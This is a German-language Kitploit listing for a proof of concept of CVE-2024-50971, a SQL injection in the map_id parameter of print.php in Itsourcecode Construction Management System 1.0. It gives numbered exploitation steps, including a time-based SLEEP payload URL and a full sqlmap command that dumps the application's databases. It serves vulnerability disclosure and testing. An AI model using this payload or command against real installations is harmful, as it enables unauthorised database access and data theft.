Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-50971 — Proof-of-concept für eine SQL-Injection-Schwachstelle im Itsourcecode Construction Management System 1.0, mit Schritten zur Ausnutzung und SQLMap-Integration zur Datenbankextraktion. | Kitploit
Tools/GitHubGitHub/akhlak2511/cve-2024-50971
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsDatenbanksicherheit
GitHubakhlak2511/cve-2024-50971

CVE-2024-50971

Proof-of-concept für eine SQL-Injection-Schwachstelle im Itsourcecode Construction Management System 1.0, mit Schritten zur Ausnutzung und SQLMap-Integration zur Datenbankextraktion.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-50971

Beschreibung

Eine SQL-Injection-Schwachstelle in print.php des Itsourcecode Construction Management System 1.0 ermöglicht es entfernten Angreifern, beliebige SQL-Befehle über den Parameter map_id auszuführen.

Schwachstellentyp

SQL Injection

Anbieter des Produkts

Itsourcecode

Betroffene Produktcodebasis:

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

Betroffene Komponente:

Das Itsourcecode Construction Management System v1.0 ist anfällig für SQL-Injection über den Parameter map_id auf der Seite print.php.

Angriffsvektoren:

  1. Richten Sie die Anwendung lokal ein, registrieren Sie ein Konto und melden Sie sich mit den Admin-Anmeldedaten admin:admin an.
  2. Navigieren Sie in Ihrem Browser zur folgenden URL: http://localhost/monitoring_system/print.php?map_id=67
  3. SQL-Payload injizieren: Ändern Sie den Parameter map_id in der URL, um eine zeitbasierte SQL-Injection-Payload einzufügen. http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
  4. Beobachten Sie die Antwort der Anwendung: Die Seite sollte bei erfolgreicher Injection deutlich länger (15 Sekunden) zum Laden benötigen, was bestätigt, dass der Parameter map_id anfällig für SQL-Injection ist.
  5. Verwenden Sie nun das SQLMap-Tool zur weiteren Ausnutzung und zum Dumping von Datenbanken mit dem folgenden Befehl: sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast

Referenzen:

  1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
  2. https://owasp.org/www-community/attacks/SQL_Injection
Tool herunterladen